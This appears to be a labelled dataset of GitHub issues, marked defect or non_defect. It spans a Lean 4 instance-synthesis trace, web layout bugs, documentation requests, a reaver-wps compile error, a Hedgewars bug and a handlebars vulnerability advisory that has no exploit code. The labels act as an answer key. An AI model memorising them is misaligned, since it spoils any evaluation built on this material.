[Meta.synthInstance] [0.000087s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000032s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000037s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000020s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29960))
[Meta.synthInstance] [0.000076s] 💥 CompleteLattice ?m.29914
[Meta.synthInstance] [0.000029s] new goal CompleteLattice ?m.29914
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000031s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29914
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29914 ≟ CompleteLattice (WithTop (WithBot ?m.29992))
[Meta.synthInstance] [0.000081s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000026s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000038s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000021s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30023))
[Meta.synthInstance] [0.000073s] 💥 CompleteLattice ?m.29915
[Meta.synthInstance] [0.000027s] new goal CompleteLattice ?m.29915
[Meta.synthInstance.instances] #[@CompleteLinearOrder.toCompleteLattice, @Order.Frame.toCompleteLattice, @Order.Coframe.toCompleteLattice, Prop.completeLattice, @Pi.completeLattice, @AddCon.instCompleteLatticeCon, @Submodule.completeLattice, @WithBot.WithTop.completeLattice, @fixedPoints.completeLattice, @Subgroup.instCompleteLatticeSubgroup, @Setoid.co
mpleteLattice, @AddSubmonoid.instCompleteLatticeAddSubmonoid, @Subsemiring.instCompleteLatticeSubsemiring, @AddSubgroup.instCompleteLatticeAddSubgroup, @Subring.instCompleteLatticeSubring, @Subsemigroup.instCompleteLatticeSubsemigroup, @AddSubsemigroup.instCompleteLatticeSubsemigroup, @Con.instCompleteLatticeCon, OrderDual.completeLattice, @Algebra.instCompleteLa
tticeSubalgebra, Prod.completeLattice, @OrderHom.instCompleteLatticeOrderHomToPreorderToPartialOrderToCompleteSemilatticeInf, @Submonoid.instCompleteLatticeSubmonoid, @WithTop.WithBot.completeLattice]
[Meta.synthInstance] [0.000030s] 💥 apply @WithTop.WithBot.completeLattice to CompleteLattice ?m.29915
[Meta.synthInstance.tryResolve] [0.000014s] 💥 CompleteLattice
?m.29915 ≟ CompleteLattice (WithTop (WithBot ?m.30055))
... <many more bombs>
```
I'm assuming the fact that we try to apply instances that we should know will fail is due to
https://github.com/leanprover/lean4/blob/9bc6fa1c6ef2ad7056adb113350c955e5d516bc5/src/Lean/Meta/DiscrTree.lean#L425-L439
It should probably be possible to have the discrimination tree return a flag expressing that some instances were omitted because of read-only mvars and then throw the stuck exception when no other instance applies instead of returning and trying them all.
|
non_defect
|
tc synthesis of types with mvars should be optimized i m observing traces such as ✅ coefun m → m fun x m → m new goal coefun m → m tc ✅ apply funlike hascoetofun to coefun m → m fun x a m → m a ✅ coefun m → m fun x a m → m a ≟ coefun m → m fun x a m → m a new goal funlike m → m tc tc 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice algebra instcompletela tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice algebra instcompletela tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice algebra instcompletela tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m 💥 completelattice m new goal completelattice m completelinearorder tocompletelattice order frame tocompletelattice order coframe tocompletelattice prop completelattice pi completelattice addcon instcompletelatticecon submodule completelattice withbot withtop completelattice fixedpoints completelattice subgroup instcompletelatticesubgroup setoid co mpletelattice addsubmonoid instcompletelatticeaddsubmonoid subsemiring instcompletelatticesubsemiring addsubgroup instcompletelatticeaddsubgroup subring instcompletelatticesubring subsemigroup instcompletelatticesubsemigroup addsubsemigroup instcompletelatticesubsemigroup con instcompletelatticecon orderdual completelattice algebra instcompletela tticesubalgebra prod completelattice orderhom instcompletelatticeorderhomtopreordertopartialordertocompletesemilatticeinf submonoid instcompletelatticesubmonoid withtop withbot completelattice 💥 apply withtop withbot completelattice to completelattice m 💥 completelattice m ≟ completelattice withtop withbot m i m assuming the fact that we try to apply instances that we should know will fail is due to it should probably be possible to have the discrimination tree return a flag expressing that some instances were omitted because of read only mvars and then throw the stuck exception when no other instance applies instead of returning and trying them all
| 0
|
153,181
| 24,083,706,919
|
IssuesEvent
|
2022-09-19 09:01:47
|
liqd/liqd-site
|
https://api.github.com/repos/liqd/liqd-site
|
closed
|
6060 intro text LA landing page box too big on large desktop screens
|
Type: UX/UI or design
|
**URL:** https://dev.liqd.net/de/academy-landing-page-test/
**user:** visitor
**expected behaviour:** less space around intro text/ smaller box with gradient background
**behaviour:** gradient background of intro text covers half of the page
**important screensize:**desktop, 1920px and more
**device & browser:** chrome, max
**Comment/Question:**
@mcastro-lqd Is this the intended design?
Screenshot?

|
1.0
|
6060 intro text LA landing page box too big on large desktop screens - **URL:** https://dev.liqd.net/de/academy-landing-page-test/
**user:** visitor
**expected behaviour:** less space around intro text/ smaller box with gradient background
**behaviour:** gradient background of intro text covers half of the page
**important screensize:**desktop, 1920px and more
**device & browser:** chrome, max
**Comment/Question:**
@mcastro-lqd Is this the intended design?
Screenshot?

|
non_defect
|
intro text la landing page box too big on large desktop screens url user visitor expected behaviour less space around intro text smaller box with gradient background behaviour gradient background of intro text covers half of the page important screensize desktop and more device browser chrome max comment question mcastro lqd is this the intended design screenshot
| 0
|
20,398
| 3,352,670,766
|
IssuesEvent
|
2015-11-17 23:54:37
|
FreeRADIUS/freeradius-server
|
https://api.github.com/repos/FreeRADIUS/freeradius-server
|
opened
|
listeners no longer bound correctly to virtual servers
|
defect v3.1.x
|
Lots of other things to do... Should be easy to replicate.
|
1.0
|
listeners no longer bound correctly to virtual servers - Lots of other things to do... Should be easy to replicate.
|
defect
|
listeners no longer bound correctly to virtual servers lots of other things to do should be easy to replicate
| 1
|
17,112
| 10,603,748,052
|
IssuesEvent
|
2019-10-10 16:37:54
|
MicrosoftDocs/azure-docs
|
https://api.github.com/repos/MicrosoftDocs/azure-docs
|
closed
|
Break out "customizable" into "custom acoustic model" and "custom language model"
|
Pri1 assigned-to-author cognitive-services/svc doc-enhancement speech-service/subsvc triaged
|
The [table at the top of this page](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#speech-to-text) describes which speech-to-text languages support customization, but it is not clear whether "customization" refers to acoustic model customization, language model customization, or both.
The reason for my uncertainty is [this Issue](https://github.com/MicrosoftDocs/azure-docs/issues/37518) which suggests that some languages currently only support one type of customization.
Can you please clarify the type of model customization (acoustic vs. language) that is supported for each language? Thanks!
---
#### Document Details
⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*
* ID: 4de08d1f-8114-7bef-7ef4-022f79c69742
* Version Independent ID: 4c0ceab9-24ed-de01-db30-31acf1de0f48
* Content: [Language support - Speech Service - Azure Cognitive Services](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#feedback)
* Content Source: [articles/cognitive-services/Speech-Service/language-support.md](https://github.com/Microsoft/azure-docs/blob/master/articles/cognitive-services/Speech-Service/language-support.md)
* Service: **cognitive-services**
* Sub-service: **speech-service**
* GitHub Login: @erhopf
* Microsoft Alias: **erhopf**
|
2.0
|
Break out "customizable" into "custom acoustic model" and "custom language model" - The [table at the top of this page](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#speech-to-text) describes which speech-to-text languages support customization, but it is not clear whether "customization" refers to acoustic model customization, language model customization, or both.
The reason for my uncertainty is [this Issue](https://github.com/MicrosoftDocs/azure-docs/issues/37518) which suggests that some languages currently only support one type of customization.
Can you please clarify the type of model customization (acoustic vs. language) that is supported for each language? Thanks!
---
#### Document Details
⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*
* ID: 4de08d1f-8114-7bef-7ef4-022f79c69742
* Version Independent ID: 4c0ceab9-24ed-de01-db30-31acf1de0f48
* Content: [Language support - Speech Service - Azure Cognitive Services](https://docs.microsoft.com/en-us/azure/cognitive-services/speech-service/language-support#feedback)
* Content Source: [articles/cognitive-services/Speech-Service/language-support.md](https://github.com/Microsoft/azure-docs/blob/master/articles/cognitive-services/Speech-Service/language-support.md)
* Service: **cognitive-services**
* Sub-service: **speech-service**
* GitHub Login: @erhopf
* Microsoft Alias: **erhopf**
|
non_defect
|
break out customizable into custom acoustic model and custom language model the describes which speech to text languages support customization but it is not clear whether customization refers to acoustic model customization language model customization or both the reason for my uncertainty is which suggests that some languages currently only support one type of customization can you please clarify the type of model customization acoustic vs language that is supported for each language thanks document details ⚠ do not edit this section it is required for docs microsoft com ➟ github issue linking id version independent id content content source service cognitive services sub service speech service github login erhopf microsoft alias erhopf
| 0
|
15,228
| 11,423,208,852
|
IssuesEvent
|
2020-02-03 15:31:27
|
reservix-ui/marigold
|
https://api.github.com/repos/reservix-ui/marigold
|
closed
|
Setup greenkeper or depandabot
|
infrastructure
|
Or does Github do this now for us???
Also: https://renovatebot.com/
---> check which is the best tool
|
1.0
|
Setup greenkeper or depandabot - Or does Github do this now for us???
Also: https://renovatebot.com/
---> check which is the best tool
|
non_defect
|
setup greenkeper or depandabot or does github do this now for us also check which is the best tool
| 0
|
30,867
| 6,334,342,943
|
IssuesEvent
|
2017-07-26 16:27:12
|
hazelcast/hazelcast
|
https://api.github.com/repos/hazelcast/hazelcast
|
closed
|
[near-cache] Spring Support for NearCache pre-loader
|
Team: Client Team: Core Team: Integration Type: Defect
|
Currently there is no Spring support for Near-Cache preloader. At least I don't see anything in the XSD.
|
1.0
|
[near-cache] Spring Support for NearCache pre-loader - Currently there is no Spring support for Near-Cache preloader. At least I don't see anything in the XSD.
|
defect
|
spring support for nearcache pre loader currently there is no spring support for near cache preloader at least i don t see anything in the xsd
| 1
|
9,469
| 2,615,152,004
|
IssuesEvent
|
2015-03-01 06:29:29
|
chrsmith/reaver-wps
|
https://api.github.com/repos/chrsmith/reaver-wps
|
opened
|
Compile error with gcc 4.6: wpscrack.c:38:30: warning: variable ‘r’ set but not used [-Wunused-but-set-variable]
|
auto-migrated Priority-Triage Type-Defect
|
```
..
wpscrack.c: In function ‘main’:
wpscrack.c:39:6: error: redefinition of ‘ret_val’
wpscrack.c:38:6: note: previous definition of ‘ret_val’ was here
wpscrack.c:38:30: warning: variable ‘r’ set but not used
[-Wunused-but-set-variable]
make: *** [reaver] Error 1
reaver 1.4
```
Original issue reported on code.google.com by `jimbobpa...@gmail.com` on 27 Jan 2012 at 2:05
|
1.0
|
Compile error with gcc 4.6: wpscrack.c:38:30: warning: variable ‘r’ set but not used [-Wunused-but-set-variable] - ```
..
wpscrack.c: In function ‘main’:
wpscrack.c:39:6: error: redefinition of ‘ret_val’
wpscrack.c:38:6: note: previous definition of ‘ret_val’ was here
wpscrack.c:38:30: warning: variable ‘r’ set but not used
[-Wunused-but-set-variable]
make: *** [reaver] Error 1
reaver 1.4
```
Original issue reported on code.google.com by `jimbobpa...@gmail.com` on 27 Jan 2012 at 2:05
|
defect
|
compile error with gcc wpscrack c warning variable ‘r’ set but not used wpscrack c in function ‘main’ wpscrack c error redefinition of ‘ret val’ wpscrack c note previous definition of ‘ret val’ was here wpscrack c warning variable ‘r’ set but not used make error reaver original issue reported on code google com by jimbobpa gmail com on jan at
| 1
|
29,306
| 5,641,777,364
|
IssuesEvent
|
2017-04-06 19:31:15
|
NeoVintageous/NeoVintageous
|
https://api.github.com/repos/NeoVintageous/NeoVintageous
|
opened
|
Use normal mode when other plugins selects text.
|
TYPE: defect
|
<a href="https://github.com/haakenlid"><img src="https://avatars0.githubusercontent.com/u/1686266?v=3" align="left" width="96" height="96" hspace="10"></img></a> **Issue by [haakenlid](https://github.com/haakenlid)**
_Sunday Jun 08, 2014 at 12:49 GMT_
_Originally opened as https://github.com/guillermooo/Vintageous/issues/632_
----
Sublime Text's built-in "Goto Symbol" and Sublimelint's "Goto Lint Error" will select some text and automatically make Vintageous enter visual mode. I find this very annoying and counter-intuitive, because I want to stay in normal mode unless I explicitly need to use visual mode.
Is there some way to automatically exit visual mode when some other plugin selects text on my behalf? Of course I would like to still be able to use the mouse to select text and enter visual mode.
|
1.0
|
Use normal mode when other plugins selects text. - <a href="https://github.com/haakenlid"><img src="https://avatars0.githubusercontent.com/u/1686266?v=3" align="left" width="96" height="96" hspace="10"></img></a> **Issue by [haakenlid](https://github.com/haakenlid)**
_Sunday Jun 08, 2014 at 12:49 GMT_
_Originally opened as https://github.com/guillermooo/Vintageous/issues/632_
----
Sublime Text's built-in "Goto Symbol" and Sublimelint's "Goto Lint Error" will select some text and automatically make Vintageous enter visual mode. I find this very annoying and counter-intuitive, because I want to stay in normal mode unless I explicitly need to use visual mode.
Is there some way to automatically exit visual mode when some other plugin selects text on my behalf? Of course I would like to still be able to use the mouse to select text and enter visual mode.
|
defect
|
use normal mode when other plugins selects text issue by sunday jun at gmt originally opened as sublime text s built in goto symbol and sublimelint s goto lint error will select some text and automatically make vintageous enter visual mode i find this very annoying and counter intuitive because i want to stay in normal mode unless i explicitly need to use visual mode is there some way to automatically exit visual mode when some other plugin selects text on my behalf of course i would like to still be able to use the mouse to select text and enter visual mode
| 1
|
185,245
| 6,720,281,024
|
IssuesEvent
|
2017-10-16 07:05:42
|
asterics/AsTeRICS
|
https://api.github.com/repos/asterics/AsTeRICS
|
opened
|
Update landing page of ARE webserver
|
high priority
|
As of the [webserver document root specification](https://github.com/asterics/AsTeRICS/wiki/AsTeRICS-webserver-document-root-specification) a landing page must be created, which links to all the interesting subpages/webapplications of AsTeRICS.
|
1.0
|
Update landing page of ARE webserver - As of the [webserver document root specification](https://github.com/asterics/AsTeRICS/wiki/AsTeRICS-webserver-document-root-specification) a landing page must be created, which links to all the interesting subpages/webapplications of AsTeRICS.
|
non_defect
|
update landing page of are webserver as of the a landing page must be created which links to all the interesting subpages webapplications of asterics
| 0
|
182,268
| 21,664,495,126
|
IssuesEvent
|
2022-05-07 01:32:41
|
Watemlifts/wagtail
|
https://api.github.com/repos/Watemlifts/wagtail
|
closed
|
WS-2019-0331 (Medium) detected in handlebars-4.0.11.tgz - autoclosed
|
security vulnerability
|
## WS-2019-0331 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.0.11.tgz</b></p></summary>
<p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p>
<p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz</a></p>
<p>Path to dependency file: /wagtail/package.json</p>
<p>Path to vulnerable library: wagtail/node_modules/handlebars/package.json</p>
<p>
Dependency Hierarchy:
- jest-22.0.3.tgz (Root Library)
- jest-cli-22.4.4.tgz
- istanbul-api-1.2.1.tgz
- istanbul-reports-1.1.3.tgz
- :x: **handlebars-4.0.11.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/Watemlifts/wagtail/commit/0bda50cc4c9d8ea0cb475001d0de89ff518301eb">0bda50cc4c9d8ea0cb475001d0de89ff518301eb</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
Arbitrary Code Execution vulnerability found in handlebars before 4.5.2. Lookup helper fails to validate templates. Attack may submit templates that execute arbitrary JavaScript in the system.
<p>Publish Date: 2019-11-13
<p>URL: <a href=https://github.com/wycats/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e>WS-2019-0331</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 2 Score Details (<b>5.0</b>)</summary>
<p>
Base Score Metrics not available</p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://www.npmjs.com/advisories/1316">https://www.npmjs.com/advisories/1316</a></p>
<p>Release Date: 2019-12-05</p>
<p>Fix Resolution: handlebars - 4.5.2</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
|
True
|
WS-2019-0331 (Medium) detected in handlebars-4.0.11.tgz - autoclosed - ## WS-2019-0331 - Medium Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.0.11.tgz</b></p></summary>
<p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p>
<p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz</a></p>
<p>Path to dependency file: /wagtail/package.json</p>
<p>Path to vulnerable library: wagtail/node_modules/handlebars/package.json</p>
<p>
Dependency Hierarchy:
- jest-22.0.3.tgz (Root Library)
- jest-cli-22.4.4.tgz
- istanbul-api-1.2.1.tgz
- istanbul-reports-1.1.3.tgz
- :x: **handlebars-4.0.11.tgz** (Vulnerable Library)
<p>Found in HEAD commit: <a href="https://github.com/Watemlifts/wagtail/commit/0bda50cc4c9d8ea0cb475001d0de89ff518301eb">0bda50cc4c9d8ea0cb475001d0de89ff518301eb</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
Arbitrary Code Execution vulnerability found in handlebars before 4.5.2. Lookup helper fails to validate templates. Attack may submit templates that execute arbitrary JavaScript in the system.
<p>Publish Date: 2019-11-13
<p>URL: <a href=https://github.com/wycats/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e>WS-2019-0331</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 2 Score Details (<b>5.0</b>)</summary>
<p>
Base Score Metrics not available</p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://www.npmjs.com/advisories/1316">https://www.npmjs.com/advisories/1316</a></p>
<p>Release Date: 2019-12-05</p>
<p>Fix Resolution: handlebars - 4.5.2</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
|
non_defect
|
ws medium detected in handlebars tgz autoclosed ws medium severity vulnerability vulnerable library handlebars tgz handlebars provides the power necessary to let you build semantic templates effectively with no frustration library home page a href path to dependency file wagtail package json path to vulnerable library wagtail node modules handlebars package json dependency hierarchy jest tgz root library jest cli tgz istanbul api tgz istanbul reports tgz x handlebars tgz vulnerable library found in head commit a href vulnerability details arbitrary code execution vulnerability found in handlebars before lookup helper fails to validate templates attack may submit templates that execute arbitrary javascript in the system publish date url a href cvss score details base score metrics not available suggested fix type upgrade version origin a href release date fix resolution handlebars step up your open source security game with whitesource
| 0
|
644,732
| 20,986,104,710
|
IssuesEvent
|
2022-03-29 03:27:01
|
EspressoSystems/cape
|
https://api.github.com/repos/EspressoSystems/cape
|
opened
|
Wallet :name parameter
|
bug priority: high wallet security wallet API unplanned
|
The `:name` parameter is used directly as the wallet file name, so this should be changed to something assured to be a valid file name, e.g. no path separators and length supported across platforms Linux, MacOS, and Windows.
|
1.0
|
Wallet :name parameter - The `:name` parameter is used directly as the wallet file name, so this should be changed to something assured to be a valid file name, e.g. no path separators and length supported across platforms Linux, MacOS, and Windows.
|
non_defect
|
wallet name parameter the name parameter is used directly as the wallet file name so this should be changed to something assured to be a valid file name e g no path separators and length supported across platforms linux macos and windows
| 0
|
27,733
| 5,089,560,109
|
IssuesEvent
|
2017-01-01 18:07:58
|
betamaxteam/betamax
|
https://api.github.com/repos/betamaxteam/betamax
|
closed
|
Tapes may not be written for SSL tests
|
defect
|
First test is written; subsequent tapes may not be written. Seems to depend on whether the SSL connection remains open.
Test case: https://gist.github.com/steveims/5536572
|
1.0
|
Tapes may not be written for SSL tests - First test is written; subsequent tapes may not be written. Seems to depend on whether the SSL connection remains open.
Test case: https://gist.github.com/steveims/5536572
|
defect
|
tapes may not be written for ssl tests first test is written subsequent tapes may not be written seems to depend on whether the ssl connection remains open test case
| 1
|
15,564
| 2,860,695,064
|
IssuesEvent
|
2015-06-03 17:00:58
|
dart-lang/sdk
|
https://api.github.com/repos/dart-lang/sdk
|
closed
|
add deprecation msg to web_ui compiler and/or @deprecate on key methods
|
Area-Pkg Pkg-Polymer PolymerMilestone-Later Priority-Low Triaged Type-Defect
|
Polymer (nee web_ui) 0.4 is old and should feel old :)
|
1.0
|
add deprecation msg to web_ui compiler and/or @deprecate on key methods - Polymer (nee web_ui) 0.4 is old and should feel old :)
|
defect
|
add deprecation msg to web ui compiler and or deprecate on key methods polymer nee web ui is old and should feel old
| 1
|
290,904
| 8,909,722,501
|
IssuesEvent
|
2019-01-18 07:34:00
|
exporl/apex
|
https://api.github.com/repos/exporl/apex
|
closed
|
fdroid update
|
High priority
|
fdroid update doesn't seem to work, would be very useful given that there have been many changes recently multiple updates of APEX on tablet have been necessary
|
1.0
|
fdroid update - fdroid update doesn't seem to work, would be very useful given that there have been many changes recently multiple updates of APEX on tablet have been necessary
|
non_defect
|
fdroid update fdroid update doesn t seem to work would be very useful given that there have been many changes recently multiple updates of apex on tablet have been necessary
| 0
|
67,530
| 9,064,380,953
|
IssuesEvent
|
2019-02-14 00:48:50
|
USGS-Astrogeology/ISIS3
|
https://api.github.com/repos/USGS-Astrogeology/ISIS3
|
closed
|
Developer Coding Standards Page std::string for Qt5
|
documentation good first issue wontfix
|
---
Author Name: **Ian Humphrey** (Ian Humphrey)
Original Assignee: Adam Goins
---
*Note: This ticket should be fixed when Qt5 is rolled out into trunk, not any earlier*
On the Developer Coding Standards Page in the [std::string](https://isis.astrogeology.usgs.gov/documents/CodingStandards/CodingStandards.html#std::string) section, the last sentence
~~~
If you need to convert to a const char *, you can also use QString().toAscii().data().
~~~
needs to be changed when Qt5 is rolled out into trunk.
Instead of QString().toAscii().data(), it should be **QString().toLatin1().data()** (since toAscii() is deprecated in Qt5).
|
1.0
|
Developer Coding Standards Page std::string for Qt5 - ---
Author Name: **Ian Humphrey** (Ian Humphrey)
Original Assignee: Adam Goins
---
*Note: This ticket should be fixed when Qt5 is rolled out into trunk, not any earlier*
On the Developer Coding Standards Page in the [std::string](https://isis.astrogeology.usgs.gov/documents/CodingStandards/CodingStandards.html#std::string) section, the last sentence
~~~
If you need to convert to a const char *, you can also use QString().toAscii().data().
~~~
needs to be changed when Qt5 is rolled out into trunk.
Instead of QString().toAscii().data(), it should be **QString().toLatin1().data()** (since toAscii() is deprecated in Qt5).
|
non_defect
|
developer coding standards page std string for author name ian humphrey ian humphrey original assignee adam goins note this ticket should be fixed when is rolled out into trunk not any earlier on the developer coding standards page in the section the last sentence if you need to convert to a const char you can also use qstring toascii data needs to be changed when is rolled out into trunk instead of qstring toascii data it should be qstring data since toascii is deprecated in
| 0
|
8,052
| 2,611,450,195
|
IssuesEvent
|
2015-02-27 04:58:39
|
chrsmith/hedgewars
|
https://api.github.com/repos/chrsmith/hedgewars
|
closed
|
Hedgehog gets trapped inside the explosive
|
auto-migrated Priority-Medium Type-Defect
|
```
What steps will reproduce the problem?
1. Set number of explosives to max and run Hedgewars.
2. Find out if there are three explosives on one level and if there is a
hedgehog between them.
3. Shoot the barrel in the middle.
What is the expected output? What do you see instead?
Sometimes, the hedgehog doesn't bounce of the explosive, but he gets inside it.
You can't move him out of the explosive (I haven't tried to fire a weapon in
this state).
What version of the product are you using? On what operating system?
0.9.13 on Windows XP SP 2
Please provide any additional information below.
```
Original issue reported on code.google.com by `adibiaz...@gmail.com` on 27 Aug 2010 at 12:57
Attachments:
* [Schowek01.bmp](https://storage.googleapis.com/google-code-attachments/hedgewars/issue-18/comment-0/Schowek01.bmp)
|
1.0
|
Hedgehog gets trapped inside the explosive - ```
What steps will reproduce the problem?
1. Set number of explosives to max and run Hedgewars.
2. Find out if there are three explosives on one level and if there is a
hedgehog between them.
3. Shoot the barrel in the middle.
What is the expected output? What do you see instead?
Sometimes, the hedgehog doesn't bounce of the explosive, but he gets inside it.
You can't move him out of the explosive (I haven't tried to fire a weapon in
this state).
What version of the product are you using? On what operating system?
0.9.13 on Windows XP SP 2
